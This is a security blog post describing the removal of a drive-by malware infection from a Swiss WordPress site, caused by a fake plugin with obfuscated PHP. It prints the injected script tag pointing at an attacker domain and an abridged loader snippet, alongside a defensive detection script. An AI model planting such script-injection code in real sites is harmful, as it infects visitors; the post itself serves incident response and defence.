How to Remove “Drive-By” Malware & Fix a SWITCH Domain Deactivation Warning

Quick Summary: The “Drive-By” Hack

The Problem: A Swiss client received a warning from their registrar (SWITCH) that their site was hosting “Drive-By” malware and would be deactivated in 4 hours.

The Cause: A fake WordPress plugin containing obfuscated PHP code.

The Malicious Code: A hidden script injecting simplecopseholding.com JavaScript into every page header.

The Fix: We identified the rogue plugin via manual file inspection, deleted it, cleared the cache, and submitted a clean report to SaferInternet.ch.

Imagine opening your email on a Friday afternoon, only to find a terrifying message from your domain registrar, SWITCH:

“It has come to our attention that the website [your-domain].ch is being misused for Drive-By… If you have not yet cleaned your website by 17.11.2025 16:42, SWITCH will temporarily deactivate the domain name…”

This is the exact message one of my clients received. They had less than four hours to find and remove a “Drive-By” malware infection or their entire website would be taken offline.

This is the story of how I hunted down the infection, cleaned the site, and saved the domain from deactivation—all before the deadline.


What is a “Drive-By” Warning?

First, let’s break down why this warning is so serious.

  • SWITCH: This is the official registrar for all .ch domains in Switzerland. A warning from them is the most serious alert a Swiss website owner can receive. They do not bluff.
  • “Drive-By” Misuse: This means the website was hacked to infect its visitors. Simply visiting an infected page is enough to download malware (like ransomware or spyware) onto a person’s computer without them clicking anything.

The warning email included a link to a saferinternet.ch status page, which confirmed the problem and provided our first clue.

Screenshot of the SWITCH domain deactivation warning email regarding Drive-By malware


The Investigation: Tracing the Payload

The SaferInternet report gave us the “smoking gun”—a specific piece of malicious code that was loading on the client’s site:

<script id="hexagoncontrail-js" src="https://simplecopseholding.com/jWcTAonomVveWlRkcUjN6PF-aopGXJy" type="text/javascript"></script>

This single line of code was the “payload.” It secretly loaded a script from simplecopseholding.com, a domain owned by attackers. This script was responsible for the infection.

Now I knew what the problem was. The next question was how it got there.


The Source: A “Fake Plugin” in Disguise

I started by scanning the theme files (header.php, functions.php), but they were clean. The malicious script wasn’t in the posts or pages either.

After a full manual scan of the wp-content directory, I found the source: a fake, malicious plugin.

Hackers often hide malware inside files that look like legitimate plugins. In this case, the plugin contained a PHP file with incredibly confusing code. This is called obfuscation, and it is designed to bypass basic security scanners.

Decoding the Malware Logic

The code was full of nonsense function names like coincidemajesticallywing() to make it unreadable to humans. Here is a snippet of what I found:

<?php
function coincidemajesticallywing()
{
    // ...a huge block of unreadable, encoded text...
    $bestrideimpish = 'VkZod1ZtVkZOWEZhZWtrOQ==...';
    // ...more confusing code to decode the text...
    
    return $dearlyvery; // This variable holds the decoded malware URL
}

// ...several other random-looking, non-functional "junk" functions...

// AND HERE IS THE FINAL ATTACK:
wp_register_script('hexagoncontrail', coincidemajesticallywing(), array(), null, false);

The Developer’s Analysis:
Hidden at the very bottom was the line that did all the damage: wp_register_script().

This is a standard WordPress function used to load scripts. However, the hackers weaponized it. They used the coincidemajesticallywing() function to decode the malicious URL (simplecopseholding.com) and inject it into the header of every single page on the website.
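As an added example (not code from the article, the client's site or WordPress itself), here is a Python triage script that automates the two checks this investigation relied on: listing third-party <script src> hosts in a page's rendered HTML, and flagging plugin PHP that passes wp_register_script()/wp_enqueue_script() a function result instead of a literal URL, or that carries a base64 literal which decodes to a URL. The host name, base64 string and both sample inputs are constructed placeholders, not the real indicators.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed sample inputs (not from the compromised site): the URL below is a
# placeholder, and the base64 literal is built from it to mirror the pattern above.
FAKE_URL = "https://attacker-host.invalid/loader.js"
ENCODED = base64.b64encode(FAKE_URL.encode()).decode()
SAMPLE_PHP = (
    "<?php\nfunction coincidemajesticallywing()\n{\n"
    f"    $bestrideimpish = '{ENCODED}';\n"
    "    $dearlyvery = base64_decode($bestrideimpish);\n    return $dearlyvery;\n}\n"
    "wp_register_script('hexagoncontrail', coincidemajesticallywing(), array(), null, false);\n"
)
# WordPress emits the registered handle as id="<handle>-js" on the rendered tag.
SAMPLE_HTML = (
    '<html><head><script src="/wp-includes/js/jquery.js"></script>'
    f'<script id="hexagoncontrail-js" src="{FAKE_URL}"></script></head></html>'
)

B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{24,}={0,2})'")
# Script registration whose src argument is a function call rather than a string.
DYNAMIC_SRC = re.compile(r"wp_(?:register|enqueue)_script\(\s*'[^']*'\s*,\s*([A-Za-z_]\w*)\s*\(")
SCRIPT_SRC = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']""", re.I)

def decoded_urls(php_source):
    """Base64 string literals in the PHP source that decode to an http(s) URL."""
    urls = []
    for literal in B64_LITERAL.findall(php_source):
        try:
            text = base64.b64decode(literal, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls

def dynamic_script_sources(php_source):
    """Names of functions whose return value is used as a registered script src."""
    return DYNAMIC_SRC.findall(php_source)

def foreign_script_hosts(html, allowed_hosts):
    """Hosts of absolute <script src> URLs that are not on the allow-list."""
    hosts = {urlparse(src).hostname for src in SCRIPT_SRC.findall(html)}
    return sorted(h for h in hosts if h and h not in allowed_hosts)

if __name__ == "__main__":
    print(decoded_urls(SAMPLE_PHP), dynamic_script_sources(SAMPLE_PHP))
    print(foreign_script_hosts(SAMPLE_HTML, {"example.ch"}))
```

Run the PHP checks over every file under wp-content/plugins and the HTML check against the live page before and after clearing the cache; a plugin that trips either PHP check deserves manual review even when the scanner is silent.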


The Solution: Clean-up and Prevention

With the source of the infection identified, the fix was fast:

  1. Removal: I immediately deleted the entire fake plugin folder via the File Manager.
  2. Verification: I cleared the website’s cache (WP-Rocket and Server-side) and re-scanned the source code. The malicious <script> was gone.
  3. Reporting: I used the saferinternet.ch portal to request an immediate re-scan. The site passed, and the deactivation warning was lifted—well before the 4-hour deadline.

After the immediate threat was gone, I performed a full security “hardening” to prevent this from happening again:

  • Updated all plugins, themes, and WordPress core.
  • Changed all admin passwords and Salt keys.
  • Installed a Web Application Firewall (WAF) to block future attacks.

How to Protect Your Site from a “Drive-By” Hack

This was a high-stress situation, but it is one you can avoid. Based on my experience fixing 4,500+ sites, here are the non-negotiables:

  • Keep Everything Updated: Hackers use automation to find old, vulnerable plugins. Don’t give them an easy entry.
  • Use Strong Passwords: Use a password manager. Never use “admin” as a username.
  • Never Use “Nulled” Plugins: This was likely the cause of this client’s infection. A “free” premium plugin from an unofficial site almost always contains hidden malware like the code above.

Receiving a “domain deactivation” notice is one of the scariest emails you can get. But by acting quickly and methodically, we were able to find the needle in the haystack and get the client’s site clean and safe.


Have you received a warning from SWITCH, Bluehost, or Google?

If you are facing a website security issue and don’t know where to start, do not wait until the deadline.

👉 Contact me for an emergency malware removal service.
